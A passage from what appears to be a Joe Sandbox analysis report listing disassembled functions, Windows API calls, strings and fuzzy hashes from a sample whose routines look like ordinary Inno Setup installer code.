                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                                    • String ID: D$xd
                                                                                    • API String ID: 3798668922-589168589
                                                                                    • Opcode ID: 95fcd11f6f4c2f0d745cd36e2f186585c9965836f891efbcc81fac53fca09950
                                                                                    • Instruction ID: 2770b63dbd5f0664191502d66b5aa67e7b61ccad1497a3da23e2b2c891076db0
                                                                                    • Opcode Fuzzy Hash: 95fcd11f6f4c2f0d745cd36e2f186585c9965836f891efbcc81fac53fca09950
                                                                                    • Instruction Fuzzy Hash: 4111A171644608AFEB00DBD5CC82EDE77EDEF09704F51407AF604E7291E6799D008A69
                                                                                    Function 00600654 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000B06,00000000,00000000), ref: 0060066E
                                                                                    • SendMessageW.USER32(?,00000B00,00000000,00000000), ref: 0060070B
                                                                                    Strings
                                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0060069A
                                                                                    • Failed to create DebugClientWnd, xrefs: 006006D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                    • API String ID: 3850602802-3720027226
                                                                                    • Opcode ID: 56bf4958779bfb6a8b8f845028800d3ca9d96219ab8fc1fc975935c890bdfb99
                                                                                    • Instruction ID: 4175b821cf142c8e622798afdf7fde6d0c746e5252e1edb01a77202dd48d2af0
                                                                                    • Opcode Fuzzy Hash: 56bf4958779bfb6a8b8f845028800d3ca9d96219ab8fc1fc975935c890bdfb99
                                                                                    • Instruction Fuzzy Hash: 7E1123B06843409FF310EB68DC81B9B7FD99B85708F180429F5849B3D2D7B66C50CBA6
                                                                                    Function 00619624 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005AF910: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,0066978C,00000000,005F8F3B,00000000,005F9216,?,?,0066978C), ref: 005AF941
                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00619667
                                                                                    • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 00619683
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$FullLoadNamePathRegister
                                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                                    • API String ID: 4170313675-2435364021
                                                                                    • Opcode ID: 6810aaf7b3462b74c952d5d02b70c3a4ed5764cd4a511497df33e8c168d44bba
                                                                                    • Instruction ID: a1c6d1944a89705a1ae2f70c12028eadbe445236a7dfe10c2b454775ce8fdd12
                                                                                    • Opcode Fuzzy Hash: 6810aaf7b3462b74c952d5d02b70c3a4ed5764cd4a511497df33e8c168d44bba
                                                                                    • Instruction Fuzzy Hash: FA014470704209AFEB10FBA5CD92BDE77EDEB48704F504475B500F3292EA78AE458678
                                                                                    Function 005F912D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 005F9138
                                                                                      • Part of subcall function 00420F94: DeleteFileW.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FA4
                                                                                      • Part of subcall function 00420F94: GetLastError.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FB3
                                                                                      • Part of subcall function 00420F94: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000), ref: 00420FBB
                                                                                      • Part of subcall function 00420F94: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FD6
                                                                                    • MoveFileW.KERNEL32 ref: 005F9165
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                                                    • String ID: DeleteFile$MoveFile
                                                                                    • API String ID: 3947864702-139070271
                                                                                    • Opcode ID: d6002e4c8ce380e4da7901459b48cf98f3a1534f7a2910375105cd19add7ce7d
                                                                                    • Instruction ID: b8499831526bb04dbf5f9ac4b51478e099ff73939971a2d4390da8e0a4ff792a
                                                                                    • Opcode Fuzzy Hash: d6002e4c8ce380e4da7901459b48cf98f3a1534f7a2910375105cd19add7ce7d
                                                                                    • Instruction Fuzzy Hash: CAF0497565850A9AEB00FB65D946BBE7BD4FB94304F60443BF504E32C6D93C9C01C629
                                                                                    Function 00464920 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00464A70,?,?,0043F138,00000001), ref: 004649AE
                                                                                      • Part of subcall function 00420CF0: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,0043F138,004649F0,00000000,00464A70,?,?,0043F138), ref: 00420D3F
                                                                                      • Part of subcall function 00421144: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,0043F138,00464A0B,00000000,00464A70,?,?,0043F138,00000001), ref: 00421167
                                                                                    • GetLastError.KERNEL32(00000000,00464A70,?,?,0043F138,00000001), ref: 00464A15
                                                                                      • Part of subcall function 004251D8: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,0043F138,00000000,?,00464A24,00000000,00464A70), ref: 004251FC
                                                                                      • Part of subcall function 004251D8: LocalFree.KERNEL32(00000001,00425255,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,0043F138,00000000,?,00464A24,00000000,00464A70), ref: 00425248
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                                                    • String ID: 4Dd$d{C
                                                                                    • API String ID: 503893064-2058038346
                                                                                    • Opcode ID: d401f3925e0a0a59aee2edcb24fb99114593ebe0fc7d03629d6b26652d1d1355
                                                                                    • Instruction ID: 0683953512549e244d6d4d668f9f4a6bb5012169835e8b5d33232cac3ad6031b
                                                                                    • Opcode Fuzzy Hash: d401f3925e0a0a59aee2edcb24fb99114593ebe0fc7d03629d6b26652d1d1355
                                                                                    • Instruction Fuzzy Hash: 3F41F670E002099FCB10EFB5C8815EEB7F1AF49314F90817AE904A7382DB785E01CB6A
                                                                                    Function 0040C040 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040C051
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040C0AF
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040C10C
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040C13F
                                                                                      • Part of subcall function 0040BFFC: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040C0BD), ref: 0040C013
                                                                                      • Part of subcall function 0040BFFC: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040C0BD), ref: 0040C030
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                                    • String ID:
                                                                                    • API String ID: 2255706666-0
                                                                                    • Opcode ID: e9b38d102af23e3ac96532df7ba2e3b2cca42ae78a03c66e701db43377d19ec2
                                                                                    • Instruction ID: e50dbe343586da412169edcbcf2f18ed2f71acdc650f4f92d90da3ef9dabf820
                                                                                    • Opcode Fuzzy Hash: e9b38d102af23e3ac96532df7ba2e3b2cca42ae78a03c66e701db43377d19ec2
                                                                                    • Instruction Fuzzy Hash: 11311C70A0021EDBDB10DFE9C885AAEB3B5EF04315F00427AE551E7291DB789A44CB99
                                                                                    Function 004733A4 Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32 ref: 004733C5
                                                                                    • UnregisterClassW.USER32(00473388,00400000), ref: 004733EE
                                                                                    • RegisterClassW.USER32 ref: 004733F8
                                                                                    • SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 00473443
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4025006896-0
                                                                                    • Opcode ID: 77c002dd57727ae1c120746f698cf05d15210d6afcb35098894f7f7bfabb7748
                                                                                    • Instruction ID: a8c172639951b3e6cb5da7468db87f3e5ba31e7f9e45713803e63bcfa106701e
                                                                                    • Opcode Fuzzy Hash: 77c002dd57727ae1c120746f698cf05d15210d6afcb35098894f7f7bfabb7748
                                                                                    • Instruction Fuzzy Hash: 100188717001046BCB10FF68ED81FDB739AE718306F109226F908E73A1DABADD558759
                                                                                    Function 005A3D7C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32 ref: 005A3D8F
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005A3DD1
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A3DEB
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005A3EA5,?,?,?,00000000), ref: 005A3E13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Visible
                                                                                    • String ID:
                                                                                    • API String ID: 2967648141-0
                                                                                    • Opcode ID: 3701598597631481a4bebe85878359a59fd4de1d73864697aee8f0662b462547
                                                                                    • Instruction ID: a7e9761be64e8251a726e41e5ea799dd36543e273c62785c0243dde29f2c5ab3
                                                                                    • Opcode Fuzzy Hash: 3701598597631481a4bebe85878359a59fd4de1d73864697aee8f0662b462547
                                                                                    • Instruction Fuzzy Hash: 50115670205144AFDB10EB29D889FA97FD9BB45356F448595F844CF361C774EE80C790
                                                                                    Function 0046523C Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000,?,0066978C,?,?,00644460), ref: 00465253
                                                                                    • LoadResource.KERNEL32(00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000,?,0066978C,?), ref: 0046526D
                                                                                    • SizeofResource.KERNEL32(00400000,004652D8,00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000), ref: 00465287
                                                                                    • LockResource.KERNEL32(00464B24,00000000,00400000,004652D8,00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000), ref: 00465291
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    • Opcode ID: 0f0122636f5e1f829796b1b782f7f01f5b08c6add20a43d762356a9fcebc62f1
                                                                                    • Instruction ID: cc44b1e40f387fa113896bb731206f382d166b60eb9947859bc6d233c5ebbc2f
                                                                                    • Opcode Fuzzy Hash: 0f0122636f5e1f829796b1b782f7f01f5b08c6add20a43d762356a9fcebc62f1
                                                                                    • Instruction Fuzzy Hash: 32F0D1B36046046F5744EE9DA881D9B77ECEE89368310015FF908C7206EA38DE118779
                                                                                    Function 004F9144 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004F9151
                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005A4B86,?,?,00000000,00000001,005A2E83,?,00000000,00000000,00000000,00000000), ref: 004F915A
                                                                                    • GlobalFindAtomW.KERNEL32(00000000,?,00000000,00000000,005A4B86,?,?,00000000,00000001,005A2E83,?,00000000,00000000,00000000,00000000), ref: 004F916F
                                                                                    • GetPropW.USER32(00000000,00000000), ref: 004F9186
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2582817389-0
                                                                                    • Opcode ID: 25ecc4edb2365f2cde5ab71ba1d4f521c8a402254a91719a356be1fc28b1867b
                                                                                    • Instruction ID: 6cdfd07cd157af09d6636e7e024685bcdc2838eed951bc29520a0badc25c7c68
                                                                                    • Opcode Fuzzy Hash: 25ecc4edb2365f2cde5ab71ba1d4f521c8a402254a91719a356be1fc28b1867b
                                                                                    • Instruction Fuzzy Hash: 32F0306260021666B72477B6AE85AFB328C8A057A5740297FFA01D7216D57CCC8283BD
                                                                                    Function 00644688 Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
